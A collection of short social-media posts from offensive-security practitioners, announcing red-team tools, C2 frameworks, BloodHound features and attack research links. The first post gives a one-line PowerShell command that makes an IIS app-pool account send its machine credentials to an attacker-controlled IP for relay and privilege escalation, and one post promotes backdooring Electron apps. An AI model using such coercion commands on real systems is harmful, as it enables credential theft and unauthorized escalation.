Did you know you didn't need to use a potatoes exploit to going from iis apppool account to admin or system ? Simply use: powershell iwr http://192.168.56.1 -UseDefaultCredentials To get an HTTP coerce of the machine account. 👇🧵

Happy #BloodHoundBasics day! Tired of the old 'Enable SMB signing everywhere' rec that isn't actually practical? BloodHound can help you convert that massive IT project into a doable risk mitigation effort, focused on those systems truly vulnerable to relay attacks. 🧵: 1/2

For those interested in the browser cache smuggling attack I presented yesterday, you will find the full blogpost here sensepost.com/blog/2023/brow…. I'll update it ASAP so that it includes the entire weaponizing part as well as some clever remediations I discussed with some of you :)

We've been cooking 🧑‍🍳 Exegol images 3.1.6 are live 🔷 Container startup time is 50% faster (improved my-resources performance and logging) 🚀 🔷 Images are 10% lighter (removed buildtime cache, git shallow) 🪶 🔷 New tools, released Exegol history v2 module (beta 🪲), extended

Reforging Sliver: How Simple Code Edits Can Outmaneuver EDR fortbridge.co.uk/research/refor…

As promised... this is Loki Command & Control! 🧙‍♂️🔮🪄 Thanks to Dylan Tran for his work done on the project and everyone else on the team for making this release happen! github.com/boku7/Loki

New day, new #BloodHoundBasics post! DYK that BloodHound CE now supports deep linking? This week, we released early access support that goes beyond what the old back button offered! Go back (& forward), & share your current view of the graph w/ your fellow operators today! 1/2

I Backdoored Cursor AI 😎 youtu.be/FYok3diZY78 Finally getting a chance to play with Loki C2, the super cool Node JS C2 framework for backdooring Electron applications (think Discord, Slack, too!) -- put together by the incredible Bobby Cooke 🔥We even got to nerd out over DMs to

🚀 RF Swift v0.6.0 is here! 🛡️ Now with host & network isolation, it's become THE essential tool for security work. No more host reinstallation, VM or burner laptop headaches! #RFSwift 📡✨ 👉 Release: github.com/PentHertz/RF-S…

The FastCGI library, mostly used in embedded equipment, was vulnerable for decades to an integer overflow over the IPC socket in 32-bits architecture. Check out how Shiro found it and exploited it for RCE! synacktiv.com/en/publication…

Introducing the BloodHound Query Library! 📚 Martin Sohn & Joey Dreijer explore the new collection of Cypher queries designed to help BloodHound users to unlock the full potential of the BloodHound platform by creating an open query ecosystem. ghst.ly/4jTgRQQ

FileFix - A ClickFix Alternative mrd0x.com/filefix-clickf…

New article for those curious about what they can find in the AD Recycle Bin (Bonus: I updated bloodyAD so you can play on this😉) linkedin.com/feed/update/ur…

Introducing Havoc Professional: A Lethal Presence We’re excited to share a first look at Havoc Professional, a next-generation, highly modular Command and Control framework, and Kaine-kit our fully Position Independent Code agent engineered for stealth! infinitycurve.org/blog/introduct…

This is so much! 🔥🔥😎 Found two new Potato triggers just today. Not only Potato but can also be used for LPE as remote auth is done which could be relayed to LDAP without Signing enabled. Or relayed to ADCS for a certificate. github.com/warpnet/MS-RPC…

It's been almost a year since my last blog... So, here is a new one: Extending AD CS attack surface to the cloud with Intune certificates. Also includes ESC1 over Intune (in some cases). dirkjanm.io/extending-ad-c… Oh, and a new tool for SCEP: github.com/dirkjanm/scepr…

Red teamers know the drill: endless file churning, hunting for passwords & tokens. 🔍 Meet DeepPass2, our new secret scanning tool that goes beyond structured tokens to catch those tricky free-form passwords too. Read Neeraj Gupta's blog post for more. ghst.ly/40HLNNA

And here's the direct link to Ramoreik and s_lck's work: github.com/TheSleekBoyCom…

This new SpecterOps paper fills me with so much joy

hashcat v7.0.0 released! After nearly 3 years of development and over 900,000 lines of code changed, this is easily the largest release we have ever had. Detailed writeup is available here: hashcat.net/forum/thread-1…